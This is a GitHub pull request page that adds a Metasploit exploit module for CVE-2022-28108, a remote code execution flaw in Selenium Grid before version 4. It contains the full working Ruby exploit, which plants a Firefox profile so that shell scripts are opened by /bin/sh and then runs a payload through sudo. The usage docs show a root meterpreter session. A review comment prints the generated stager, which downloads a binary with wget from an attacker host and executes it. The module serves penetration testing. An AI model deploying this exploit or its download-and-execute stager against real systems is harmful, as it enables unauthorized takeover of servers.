Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Selenium Firefox RCE module (CVE-2022-28108) #19771

Merged
merged 17 commits into from
Jan 8, 2025
Merged

Add Selenium Firefox RCE module (CVE-2022-28108) #19771

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
17 commits
Select commit Hold shift + click to select a range
340d4bc
Add selenium firefox rce module
Takahiro-Yoko Dec 28, 2024
43230b0
Review fix
Takahiro-Yoko Dec 28, 2024
90d9bb7
Update vulnerable version
Takahiro-Yoko Dec 28, 2024
c7d7407
Update modules/exploits/linux/http/selenium_greed_firefox_rce_cve_202…
Takahiro-Yoko Dec 28, 2024
02ad810
Add cleanup
Takahiro-Yoko Dec 28, 2024
cb34508
Avoid using single quote in payload
Takahiro-Yoko Dec 28, 2024
af432a3
Improve stability
Takahiro-Yoko Dec 29, 2024
e4111cd
Update to use FETCH_DELETE
Takahiro-Yoko Dec 29, 2024
68ae0d4
Add timeout option
Takahiro-Yoko Dec 29, 2024
6e0c945
Improve check for version 4
Takahiro-Yoko Dec 30, 2024
38d8d35
Update doc
Takahiro-Yoko Dec 30, 2024
3b947cf
Update vulnerable version
Takahiro-Yoko Jan 2, 2025
ec8dba8
Update failure and print about session id
Takahiro-Yoko Jan 2, 2025
710ae11
Apply suggestions from #19769
Takahiro-Yoko Jan 4, 2025
d788a3b
Update check
Takahiro-Yoko Jan 6, 2025
2be1781
Remove unnecessary version check
Takahiro-Yoko Jan 6, 2025
296d3c9
chore: removing PAYLOAD from DefaultOptions
Takahiro-Yoko Jan 8, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
92 changes: 92 additions & 0 deletions ...ntation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,92 @@
## Vulnerable Application

Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

* Selenium Server (Grid) before 4

This module was successfully tested on:

* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 20.0.4


### Installation

1. `docker pull selenium/standalone-firefox:3.141.59`

2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Options


## Scenarios
```
msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > options

Module options (exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4444 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ysvWeotTGNTE no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version 3.141.59 detected, which is vulnerable
[+] The target appears to be vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34690) at 2024-12-28 12:17:05 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.3
OS : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
142 changes: 142 additions & 0 deletions modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'
require 'uri'
require 'json'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Selenium geckodriver RCE',
'Description' => %q{
Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
},
'Author' => [
'Jon Stratton', # Exploit development
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-28108'],
['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
['URL', 'https://github.com/JonStratton/selenium-node-takeover-kit/tree/master'],
['EDB', '49915'],
],
'Payload' => {
'DisableNops' => true
},
'Platform' => %w[linux],
'Targets' => [
[
'Linux Command', {
'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'WGET'
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2022-04-18',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(4444),
bcoles marked this conversation as resolved.
Show resolved Hide resolved
]
)
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return Exploit::CheckCode::Unknown unless res&.code == 200

js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
return Exploit::CheckCode::Unknown unless js_code

json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
json_data = JSON.parse(json_str)
return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']

# Extract the version
version = Rex::Version.new(json_data['version'])
if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
end

print_status("Version #{version} detected, which is vulnerable")
Exploit::CheckCode::Appears
Takahiro-Yoko marked this conversation as resolved.
Show resolved Hide resolved
end

def exploit
# Build profile zip file.
stringio = Zip::OutputStream.write_buffer do |io|
# Create a handler for shell scripts
io.put_next_entry('handlers.json')
io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
end
stringio.rewind
encoded_profile = Base64.strict_encode64(stringio.sysread)

# Create session with our new profile
new_session = {
desiredCapabilities: {
browserName: 'firefox',
firefox_profile: encoded_profile
},
capabilities: {
firstMatch: [
{
browserName: 'firefox',
"moz:firefoxOptions": { profile: encoded_profile }
}
]
}
}

hub_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
uri = URI.parse(hub_url)
http = Net::HTTP.new(uri.host, uri.port)

# Start session with encoded_profile and save session id for cleanup.
session_uri = URI.parse("#{hub_url}/session")
request = Net::HTTP::Post.new(session_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
request.body = JSON.generate(new_session)
response = http.request(request)
session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId']

sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Presumably this will fail unless the user running Selenium can elevate to root (without a password)?

Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks!

When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. 43230b0 Does this approach seem acceptable?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

' and " are bad characters for the payload. This could be avoided by using an additional layer of encoding, such as base64.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks! I updated it to avoid using single quotes. cb34508

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What is the purpose of the rm -rf $0 here?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

When I replace rm -rf $0 with echo $0 > /tmp/whatisthis, the result of cat /tmp/whatisthis is /tmp/jus1lPj+. The result of cat /tmp/jus1lPj+ is:

echo $0 >/tmp/whatisthis
if sudo -n true 2>/dev/null; then
  sudo su root -c 'wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&'
else
  wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&
fi

When I replace echo $0 > /tmp/whatisthis with rm -rf $0, there is no file equivalent to /tmp/jus1lPj+.

So, I believe the purpose of rm -rf $0 is to clean up after the payload.

# URL.
data_url = "data:application/sh;charset=utf-16le;base64,#{Base64.encode64(sudo_payload)}"
data_uri = URI.parse("#{hub_url}/session/#{session_id}/url")
request = Net::HTTP::Post.new(data_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
request.body = JSON.generate(url: data_url)
http.read_timeout = 2
begin
http.request(request)
rescue Net::ReadTimeout
# Expected
end
bcoles marked this conversation as resolved.
Show resolved Hide resolved
end

end
Loading